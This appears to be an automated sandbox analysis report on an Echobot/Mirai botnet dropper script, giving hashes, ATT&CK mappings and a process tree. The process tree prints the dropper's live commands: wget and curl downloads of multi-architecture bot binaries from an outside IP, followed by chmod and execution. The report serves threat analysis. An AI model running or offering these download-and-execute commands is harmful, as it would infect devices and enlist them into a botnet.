echobot | 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd

Analysis

max time kernel
122s
max time network
152s
platform
debian-9_mips
resource
debian9-mipsbe-20240729-en
resource tags

arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
22-11-2024 18:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8UsA.sh
Size

1KB
MD5

513641f5f60d55559c2060489de6d605
SHA1

c95feec2255732b60d434b0639b88a5cff205ea0
SHA256

1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd
SHA512

71ee20fe10e58b1d9a0e0e5268ba264e35e15e3a5190cfdf5950245579fbbdabd9aef7dc11e9398e0df8add1afb1400a0134911b6ebb9deb937b578fc52775e0

Score

10^/10

echobot mirai botnet defense_evasion discovery trojan

Malware Config

Signatures

Detected Echobot 2 IoCs

resource	yara_rule
behavioral3/files/fstream-1.dat	family_echobot
behavioral3/files/fstream-4.dat	family_echobot

Echobot
An updated variant of Mirai which infects a wide range of IoT devices to form a botnet.
botnet trojan echobot
Echobot family
echobot
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (171856) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
746	chmod
852	chmod
889	chmod
903	chmod
931	chmod
753	chmod
769	chmod
872	chmod
917	chmod
945	chmod

Executes dropped EXE 10 IoCs

ioc	pid	Process
/tmp/3AvA	747	3AvA
/tmp/3AvA	754	3AvA
/tmp/3AvA	770	3AvA
/tmp/3AvA	853	3AvA
/tmp/3AvA	876	3AvA
/tmp/3AvA	890	3AvA
/tmp/3AvA	904	3AvA
/tmp/3AvA	918	3AvA
/tmp/3AvA	932	3AvA
/tmp/3AvA	946	3AvA

Modifies Watchdog functionality 1 TTPs 18 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA

Enumerates active TCP sockets 1 TTPs 9 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA

Changes its process name 9 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	nk1nj00ignbm34nohn	754	3AvA
Changes the process name, possibly in an attempt to hide itself	e1f21ninmjf	770	3AvA
Changes the process name, possibly in an attempt to hide itself	b3ie1e501n1bcp12id	853	3AvA
Changes the process name, possibly in an attempt to hide itself	oh0mid5g10hajb5n1bb	876	3AvA
Changes the process name, possibly in an attempt to hide itself	1g54ehb1104nfcp4b	890	3AvA
Changes the process name, possibly in an attempt to hide itself	154in4b03b3	904	3AvA
Changes the process name, possibly in an attempt to hide itself	ha14ig1kp5dc	918	3AvA
Changes the process name, possibly in an attempt to hide itself	kn121dmn30o13de22	932	3AvA
Changes the process name, possibly in an attempt to hide itself	kn2ocp54gjom2b	946	3AvA

Reads system network configuration 1 TTPs 9 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/374/fd	3AvA
File opened for reading	/proc/716/fd	3AvA
File opened for reading	/proc/667/fd	3AvA
File opened for reading	/proc/694/fd	3AvA
File opened for reading	/proc/1/fd	3AvA
File opened for reading	/proc/144/fd	3AvA
File opened for reading	/proc/667/fd	3AvA
File opened for reading	/proc/722/fd	3AvA
File opened for reading	/proc/891/fd	3AvA
File opened for reading	/proc/322/fd	3AvA
File opened for reading	/proc/144/fd	3AvA
File opened for reading	/proc/322/fd	3AvA
File opened for reading	/proc/322/fd	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/328/fd	3AvA
File opened for reading	/proc/323/fd	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/321/fd	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/421/fd	3AvA
File opened for reading	/proc/877/exe	3AvA
File opened for reading	/proc/371/fd	3AvA
File opened for reading	/proc/722/fd	3AvA
File opened for reading	/proc/722/fd	3AvA
File opened for reading	/proc/326/fd	3AvA
File opened for reading	/proc/369/fd	3AvA
File opened for reading	/proc/722/fd	3AvA
File opened for reading	/proc/953/exe	3AvA
File opened for reading	/proc/237/fd	3AvA
File opened for reading	/proc/328/fd	3AvA
File opened for reading	/proc/321/fd	3AvA
File opened for reading	/proc/1/fd	3AvA
File opened for reading	/proc/369/fd	3AvA
File opened for reading	/proc/165/fd	3AvA
File opened for reading	/proc/667/fd	3AvA
File opened for reading	/proc/694/fd	3AvA
File opened for reading	/proc/328/fd	3AvA
File opened for reading	/proc/165/fd	3AvA
File opened for reading	/proc/374/fd	3AvA
File opened for reading	/proc/369/fd	3AvA
File opened for reading	/proc/421/fd	3AvA
File opened for reading	/proc/694/fd	3AvA
File opened for reading	/proc/328/fd	3AvA
File opened for reading	/proc/667/fd	3AvA
File opened for reading	/proc/144/fd	3AvA
File opened for reading	/proc/369/fd	3AvA
File opened for reading	/proc/694/exe	3AvA
File opened for reading	/proc/165/fd	3AvA
File opened for reading	/proc/323/fd	3AvA
File opened for reading	/proc/369/fd	3AvA
File opened for reading	/proc/321/fd	3AvA
File opened for reading	/proc/694/fd	3AvA
File opened for reading	/proc/323/fd	3AvA
File opened for reading	/proc/716/fd	3AvA
File opened for reading	/proc/144/fd	3AvA
File opened for reading	/proc/421/fd	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/421/fd	3AvA
File opened for reading	/proc/328/fd	3AvA
File opened for reading	/proc/1/fd	3AvA
File opened for reading	/proc/328/fd	3AvA
File opened for reading	/proc/722/fd	3AvA
File opened for reading	/proc/905/exe	3AvA
File opened for reading	/proc/165/fd	3AvA

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
749	wget
751	curl
752	cat
754	3AvA

Writes file to tmp directory 20 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/3AvA	8UsA.sh
File opened for modification	/tmp/UnHAnaAW.m68k	wget
File opened for modification	/tmp/UnHAnaAW.m68k	curl
File opened for modification	/tmp/UnHAnaAW.sh4	wget
File opened for modification	/tmp/UnHAnaAW.mips	curl
File opened for modification	/tmp/UnHAnaAW.mpsl	curl
File opened for modification	/tmp/UnHAnaAW.arm6	wget
File opened for modification	/tmp/UnHAnaAW.arm6	curl
File opened for modification	/tmp/UnHAnaAW.ppc	curl
File opened for modification	/tmp/UnHAnaAW.sh4	curl
File opened for modification	/tmp/UnHAnaAW.mips	wget
File opened for modification	/tmp/UnHAnaAW.mpsl	wget
File opened for modification	/tmp/UnHAnaAW.arm7	wget
File opened for modification	/tmp/UnHAnaAW.arm7	curl
File opened for modification	/tmp/UnHAnaAW.x86	wget
File opened for modification	/tmp/UnHAnaAW.x86	curl
File opened for modification	/tmp/UnHAnaAW.arm4	curl
File opened for modification	/tmp/UnHAnaAW.arm5	wget
File opened for modification	/tmp/UnHAnaAW.arm5	curl
File opened for modification	/tmp/UnHAnaAW.ppc	wget

/tmp/8UsA.sh
/tmp/8UsA.sh
1⤵
- Writes file to tmp directory
PID:716
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.x86
  2⤵
  - Writes file to tmp directory
  PID:719
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.x86
  2⤵
  - Writes file to tmp directory
  PID:736
- /bin/cat
  cat UnHAnaAW.x86
  2⤵
  PID:745
- /bin/chmod
  chmod +x 3AvA 8UsA.sh systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-xxbZN4 UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:746
- /tmp/3AvA
  ./3AvA x86
  2⤵
  - Executes dropped EXE
  PID:747
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:749
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:751
- /bin/cat
  cat UnHAnaAW.mips
  2⤵
  - System Network Configuration Discovery
  PID:752
- /bin/chmod
  chmod +x 3AvA 8UsA.sh systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-xxbZN4 UnHAnaAW.mips UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:753
- /tmp/3AvA
  ./3AvA mips
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:754
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.mpsl
  2⤵
  - Writes file to tmp directory
  PID:760
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:765
- /bin/chmod
  chmod +x 3AvA 8UsA.sh systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-xxbZN4 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:769
- /tmp/3AvA
  ./3AvA mpsl
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:770
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.arm4
  2⤵
  PID:828
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.arm4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:836
- /bin/chmod
  chmod +x 3AvA 8UsA.sh systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-xxbZN4 UnHAnaAW.arm4 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:852
- /tmp/3AvA
  ./3AvA arm4
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:853
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.arm5
  2⤵
  - Writes file to tmp directory
  PID:863
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:870
- /bin/chmod
  chmod +x 3AvA 8UsA.sh systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-xxbZN4 UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:872
- /tmp/3AvA
  ./3AvA arm5
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:876
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.arm6
  2⤵
  - Writes file to tmp directory
  PID:880
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.arm6
  2⤵
  - Writes file to tmp directory
  PID:887
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:889
- /tmp/3AvA
  ./3AvA arm6
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:890
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.arm7
  2⤵
  - Writes file to tmp directory
  PID:894
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:901
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:903
- /tmp/3AvA
  ./3AvA arm7
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:904
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.ppc
  2⤵
  - Writes file to tmp directory
  PID:908
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.ppc
  2⤵
  - Writes file to tmp directory
  PID:915
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.ppc UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:917
- /tmp/3AvA
  ./3AvA ppc
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:918
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.m68k
  2⤵
  - Writes file to tmp directory
  PID:922
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.m68k
  2⤵
  - Writes file to tmp directory
  PID:929
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.m68k UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.ppc UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:931
- /tmp/3AvA
  ./3AvA m68k
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:932
- /usr/bin/wget
  wget http://89.22.230.162/bins/UnHAnaAW.sh4
  2⤵
  - Writes file to tmp directory
  PID:936
- /usr/bin/curl
  curl -O http://89.22.230.162/bins/UnHAnaAW.sh4
  2⤵
  - Writes file to tmp directory
  PID:943
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.m68k UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.ppc UnHAnaAW.sh4 UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:945
- /tmp/3AvA
  ./3AvA sh4
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:946

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/3AvA

Filesize
98KB

MD5
1bfd79e3eb8d1d5806b78c2ee800ccbe

SHA1
8c7d5fb0ffe8c51e83cfe644a961d3b2bedb5e83

SHA256
186fc8b8165ee76f730ea3b840c59473597282c472529c9b2716baab011787da

SHA512
ade41301de6fdcbd940dd4a2cd7634ffd13dfb4f24c7b2e9b3e25aae7d3a7b1dce4817eada98e628d591cf8fcd1106d5292bee05ba3bcd6b6cc502135409bc0b

Download Submit
/tmp/UnHAnaAW.x86

Filesize
69KB

MD5
4a5306ed50853b2ce31d13763bde2cd3

SHA1
12a84067a5b8ff314e005365faadd34d47ce0619

SHA256
81d46cb68a82a4f80f26f017a9e988acd67811fb5b461df2546a23ccc5f6a05d

SHA512
b9732bdbe82f34591e5e21b45f80fa7f465932aa6a6f07fd3389a866b0a94b39bd59d4f298fdd896e9b9a601bd4d72494338b1a5817d558ba3b6d2ed1d43e081

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads